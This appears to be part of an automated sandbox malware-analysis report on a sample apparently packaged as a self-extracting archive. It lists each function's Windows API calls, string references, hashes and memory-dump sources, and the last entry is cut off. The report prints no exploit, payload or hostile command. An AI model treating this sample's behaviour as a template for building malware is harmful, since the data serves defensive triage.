Instruction Fuzzy Hash: 0F31F3305447466FF7329B2CCD85BDABBD8BB44324F100B19FAE9961C2D7A9A484CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0101B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
IsDialogMessageW.USER32(0001042C,?), ref: 0101B59E
TranslateMessage.USER32(?), ref: 0101B5AC
DispatchMessageW.USER32(?), ref: 0101B5B6

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
Instruction ID: 1633354f7ded88808f9f7caf4b745224206bf1a6314bb01919f5ab00f27dd280
Opcode Fuzzy Hash: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
Instruction Fuzzy Hash: 2AF0BD71A0111ABB9B309BE59D5CEDB7FBCEE052917004415F549D6018EB3DD109CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0101ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0101ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0101ABF9

Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0101ABE9

Strings

EDIT, xrefs: 0101ABCD, 0101ABD8, 0101ABE5

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
Instruction ID: fdef43b3eb64f9e5ee46f2791b8f376966dc1bd59d8439ba5046b73dfb4533c0
Opcode Fuzzy Hash: 86de5f6d80f81292089be0f9fa0cbee86a432fd47430bfbb1b137826b0144c57
Instruction Fuzzy Hash: 57F0E232701268BAEA3056289C09FDB7AACAB42B00F080451FA84E71C8D769D94586F5

Uniqueness

Uniqueness Score: -1.00%

Function 0101DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0101DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30

Strings

sfxpar, xrefs: 0101DC2B
sfxcmd, xrefs: 0101DBEF

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
Instruction ID: 9cb1007f255d773dcb693c674015889c190e70ac8f314e663e60cf7efa3ee115
Opcode Fuzzy Hash: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
Instruction Fuzzy Hash: 6BF0ECB240422AB7DB212FD9CC49AFB3BACBF14781B040855BDC59901DE7BC8480D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 01009785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 01009795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 010097AD
GetLastError.KERNEL32 ref: 010097DF
GetLastError.KERNEL32 ref: 010097FE

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
Instruction ID: 96ad69860a02c9ad5b6ecdd5c7c81921caf53b7ec2ea1dd63a076b0d0c50013a
Opcode Fuzzy Hash: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
Instruction Fuzzy Hash: C011C231900204EBFF734E29C84466D77ECFB40328F108669F5DE852C2D7798A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0102AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,010240EF,00000000,00000000,?,0102ACDB,010240EF,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue), ref: 0102AD66
GetLastError.KERNEL32(?,0102ACDB,010240EF,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000,00000364,?,010298B7), ref: 0102AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0102ACDB,010240EF,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000), ref: 0102AD80

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
Instruction ID: 0751f8038fa6d3f97cf8c9002dd80e6159192b0d3865aa8b6ace89b4c9ebaa40
Opcode Fuzzy Hash: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
Instruction Fuzzy Hash: BE01D436701236EBC772596C9C84A5B7B9CAF056A37110620F987D7545DB2AD401C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0101101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 01011043
SetThreadPriority.KERNEL32(?,00000000), ref: 0101108A

Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54

Strings

CreateThread failed, xrefs: 0101104F

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: dd987176f7dc817e4c8c89749dc783bb6c2fe427fb068a96bf00ab391f38cfae
Instruction ID: 206cfdbbd0883072cb6439eb0a098a7f4a1882cda37c427025e3a8e6eed6be5e
Opcode Fuzzy Hash: dd987176f7dc817e4c8c89749dc783bb6c2fe427fb068a96bf00ab391f38cfae
Instruction Fuzzy Hash: 3201A7F574430A6BE2355E749C91BB6B399EB40651F10002EF6C65A285CAF668848624

Uniqueness

Uniqueness Score: -1.00%

Function 01009F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0100D343,00000001,?,?,?,00000000,0101551D,?,?,?), ref: 01009F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0101551D,?,?,?,?,?,01014FC7,?), ref: 01009FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0100D343,00000001,?,?), ref: 0100A011

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
Instruction ID: 493a91900ea6ba7a0376d952b5b7f2b7dbb6d2942c63b486677dcdc525178ea5
Opcode Fuzzy Hash: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
Instruction Fuzzy Hash: FF31DF71208309EFEB16CE24D858BBEB7A9FB80715F04051CF9C55B2D1C776A948CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0100A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0100C27E: _wcslen.LIBCMT ref: 0100C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A30C
GetLastError.KERNEL32(?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A329

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
Instruction ID: 2753721b89d16633d4da004b44c93eea8ea069dc90c5e05c833055b3f4a33166
Opcode Fuzzy Hash: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
Instruction Fuzzy Hash: BC019235700324EAFF63AA794849BED7788AF09680F048494FAC1D70C4D698D58187A5

Uniqueness

Uniqueness Score: -1.00%

Function 0102B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0102B8B8

Strings

, xrefs: 0102B8FD

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 9c701512cfaaf22ea00d2b3691950c9b4058aa8784e74eb4be2938c576f188f5
Instruction ID: 8f3a7bf5e30a118955fe2a2897e48e7c3e210e6cfc639311d24a4aca95e09aab
Opcode Fuzzy Hash: 9c701512cfaaf22ea00d2b3691950c9b4058aa8784e74eb4be2938c576f188f5
Instruction Fuzzy Hash: 7C41E6716042AC9EDB228E688C84BFABBF9EB55304F1408EDD5DA87142D275AA45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0102AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0102AFDD

Strings

LCMapStringEx, xrefs: 0102AF7D, 0102AF87

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: e0b9906e32a0b6090d8de2ec334b6e70dfb076b283a0c81f6277f221b4767153
Instruction ID: fc26a525c943a906db5dc6c05d9e3b3fbff72a473449783ad4b3c627160805c6
Opcode Fuzzy Hash: e0b9906e32a0b6090d8de2ec334b6e70dfb076b283a0c81f6277f221b4767153
Instruction Fuzzy Hash: 4101D37260021AFBCF129F91DC05DEE7FA6FB48750F014259FE546A160CA3A8931EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0102AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0102A56F), ref: 0102AF55

Strings

InitializeCriticalSectionEx, xrefs: 0102AF1B, 0102AF25

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 2ced5c81893de55df938a13417c1c1530133dcfbfa70150141e3e277c2711f07
Instruction ID: 0cd4227ebb1f8c79556e1aa949217fd28dea33b59e134ef13fec1096ed568925
Opcode Fuzzy Hash: 2ced5c81893de55df938a13417c1c1530133dcfbfa70150141e3e277c2711f07
Instruction Fuzzy Hash: 48F0BE7164521DFBCB125F55CC01CAEBFA9EF48B11B4142AAFD889B210DE364A10AB85

Uniqueness

Uniqueness Score: -1.00%

Function 0102ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0102ADEE

Strings

FlsAlloc, xrefs: 0102ADC0, 0102ADCA

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 8cb0428e01a8b448aad6cc2b16c22c881793e2412f92f569f29c5574803563fd
Instruction ID: 3a21702ad11497728db6cb2e0387121dbf0560affef3f07ab36b39d74d4d022f
Opcode Fuzzy Hash: 8cb0428e01a8b448aad6cc2b16c22c881793e2412f92f569f29c5574803563fd
Instruction Fuzzy Hash: 0FE02B7174122DBBD711AB6ADC02D6EBB9CEB54721B01029EFC869F300CD755E0187D5

Uniqueness

Uniqueness Score: -1.00%

Function 0101EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101EAF9

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Strings

3To, xrefs: 0101EAE7, 0101EAF3

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
Instruction ID: 6a392caec40f87ad32311ed5acac0c46c4695ec0245888cf11c8964c0505cc9c
Opcode Fuzzy Hash: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
Instruction Fuzzy Hash: CAB012C729A0437C30056201DE01C3F010CE6D1D90320C01FFCC8DC044DC853C060471

Uniqueness

Uniqueness Score: -1.00%

Function 0102BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0102BA89,?,00000000), ref: 0102BC64
GetCPInfo.KERNEL32(00000000,0102BA89,?,?,?,0102BA89,?,00000000), ref: 0102BC77

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: f9d0bdfd5367aae482aa07c3fe4c446ae64b2edd751f263f9167a4c55a5bfe8f
Instruction ID: dc26fb32cbd1b25910bc1b75880fbe1b411f7fc4dd38961313886e2f0b740b56
Opcode Fuzzy Hash: f9d0bdfd5367aae482aa07c3fe4c446ae64b2edd751f263f9167a4c55a5bfe8f
Instruction Fuzzy Hash: 4251557090026A9FEB21EF39C4806FABFF5EF11300F2844AEC5D68B251EA399545CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01009A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,01009A50,?,?,00000000,?,?,01008CBC,?), ref: 01009BAB
GetLastError.KERNEL32(?,00000000,01008411,-00009570,00000000,000007F3), ref: 01009BB6

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
Instruction ID: 7557fd9c4df2f93c6a0fc0a5dc7a825324d032f683c303b97ce969a12a1e8d67
Opcode Fuzzy Hash: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
Instruction Fuzzy Hash: 9841E030504B018FFB26CF18C6845AABBE9FBD4338F44896DE8D9832D2D774A8448B91

Uniqueness

Uniqueness Score: -1.00%

Function 0102BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 010297E5: GetLastError.KERNEL32(?,01041098,01024674,01041098,?,?,010240EF,?,?,01041098), ref: 010297E9
Part of subcall function 010297E5: _free.LIBCMT ref: 0102981C
Part of subcall function 010297E5: SetLastError.KERNEL32(00000000,?,01041098), ref: 0102985D
Part of subcall function 010297E5: _abort.LIBCMT ref: 01029863

Part of subcall function 0102BB4E: _abort.LIBCMT ref: 0102BB80
Part of subcall function 0102BB4E: _free.LIBCMT ref: 0102BBB4

Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6

_free.LIBCMT ref: 0102BA9F
_free.LIBCMT ref: 0102BAD5

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 3968b7f7fcec024e7d0a68942008f8737fd0df5cc6223d94ce08951dc6250c0a
Instruction ID: 93a33c4286e6209fb94db67e843b16da32ba58145b6613e35fb493199b194c46
Opcode Fuzzy Hash: 3968b7f7fcec024e7d0a68942008f8737fd0df5cc6223d94ce08951dc6250c0a
